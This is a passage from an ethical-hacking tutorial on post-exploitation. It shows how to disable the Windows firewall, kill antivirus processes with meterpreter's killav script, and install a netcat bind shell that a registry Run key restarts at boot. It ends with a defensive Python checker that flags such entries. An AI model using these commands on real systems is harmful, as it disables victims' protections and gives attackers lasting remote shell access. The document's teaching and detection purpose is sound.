Ethical Hacking and Penetration Testing Guide


Cracking the Hashes to Gain Access to Other Services



The second approach we will talk about is obtaining the hashes and then cracking them to gain access to other services such as remote desktop, VNC, or telnet. This is not a very stealthy approach, as the administrator may notice the changes you make. Considering that many users are allowed access to that particular service, this might work for us too.
Backdoors
Let's talk about backdoors first. There are several backdoors that we would manually upload to our target machine and then make changes to the registry so that we can access it even when the computer reboots. But before installing a backdoor, we should make sure that we have turned off the victim's security features such as the firewall and antivirus. Another way around this is to simply encode our backdoor so that it evades the antivirus. Let's see how to go about these approaches.
Disabling the Firewall
The reason we want to disable the firewall is that we don’t want it to interrupt us while we perform 
our postexploitation process.
From our meterpreter shell, we would issue the "shell" command to launch the Windows command prompt. From the Windows command prompt we issue the following command to turn off the firewall:
netsh firewall set opmode disable
Killing the Antivirus
The reason we want to disable the antivirus is that we don't want it to identify/delete our backdoor; we want to remain undetected while conducting our penetration test. We can check for the installed antivirus by typing the "net start" command and "tasklist /svc" from the command prompt to find the process the antivirus is running under.
Output of the "net start" command
Output of the "tasklist /svc" command
Now we can use the "taskkill" command to kill a particular process or let meterpreter automate it for us. In meterpreter, we can find a script named "killav" that will automatically kill all the processes associated with an antivirus. Let's view the contents of the script by using the "cat" command followed by the path of the script:
cat /opt/metasploit/msf3/scripts/meterpreter/killav.rb


From the output we can see that the script works by closing the processes associated with an antivirus. Though it covers lots of antiviruses, it is possible that the victim's antivirus is not in the list; in that case you need to manually identify the antivirus process and then add that process name to the script for it to work. In this way you can also help the community improve the script.
To run this script, all we need to do is execute the following command from the meterpreter shell:
meterpreter > run killav
Netcat
Netcat is one of the oldest backdoors that exist. By uploading netcat to the victim's computer we would open up a port on the victim on which it would listen for connections, and from our attacker machine we would simply connect to that port to obtain a command prompt. Netcat is located in the /pentest/windows-binaries/tools/ directory in BackTrack.
Command:
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
This command would upload netcat to the system32 directory.
Next, we need to set up netcat to load the backdoor on system boot, so we can connect to it every time we want; to do that we would edit the following registry key:
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -d 'C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe' -v netcat


So the command basically sets the registry Run value "netcat", which on every reboot starts netcat listening for connections on port 4444. We can now connect to our target machine from our attacker machine with netcat, and it will bring up the command prompt.
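As an added example (not from the book), here is a defender-side check in Python for the persistence just described: it parses the text that "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" prints and flags any value whose command line launches netcat as a listener with a shell bound to the port. The registry output it parses is a constructed sample, and the netcat binary names and shell list are assumptions made for the illustration.

```python
import re

# Constructed sample of `reg query HKLM\...\CurrentVersion\Run` output (not a
# real capture); the "netcat" value is the persistence entry described above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat            REG_SZ           C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe
    OneDrive          REG_SZ           "C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

ROW = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")  # name, type, command line
NETCAT_BINARIES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}  # assumed names
SHELLS = {"cmd.exe", "powershell.exe"}

def parse_run_values(text):
    """Yield (value_name, reg_type, command_line) for each indented data row."""
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)

def classify_listener(cmdline):
    """Return a finding if cmdline runs netcat in listen mode (-l/-L) with a
    shell bound to the port (-e cmd.exe), else None. Quotes are stripped first."""
    tokens = cmdline.replace('"', "").split() or [""]
    binary = tokens[0].rsplit("\\", 1)[-1].lower()
    if binary not in NETCAT_BINARIES:
        return None
    listen = any(t.startswith("-") and "l" in t.lower() for t in tokens[1:])
    bound = port = None
    for i, t in enumerate(tokens[1:], start=1):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if t.startswith("-") and t.endswith("e"):                      # -e <program>
            bound = nxt.lower()
        elif t.startswith("-") and t.endswith("p") and nxt.isdigit():  # -p 4444, -Ldp 4444
            port = int(nxt)
    if listen and bound in SHELLS:
        return {"binary": binary, "port": port, "bound": bound}
    return None

def audit_run_key(text):
    """One finding per Run value that launches a netcat listener bound to a shell."""
    findings = []
    for name, reg_type, cmdline in parse_run_values(text):
        hit = classify_listener(cmdline)
        if hit:
            findings.append({"value": name, "type": reg_type, **hit})
    return findings
```

On a live host the same parser can be fed the real output of the reg query command for both the HKLM and HKCU Run keys; a finding here is a strong signal that the startup entry deserves removal and the host an incident review.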
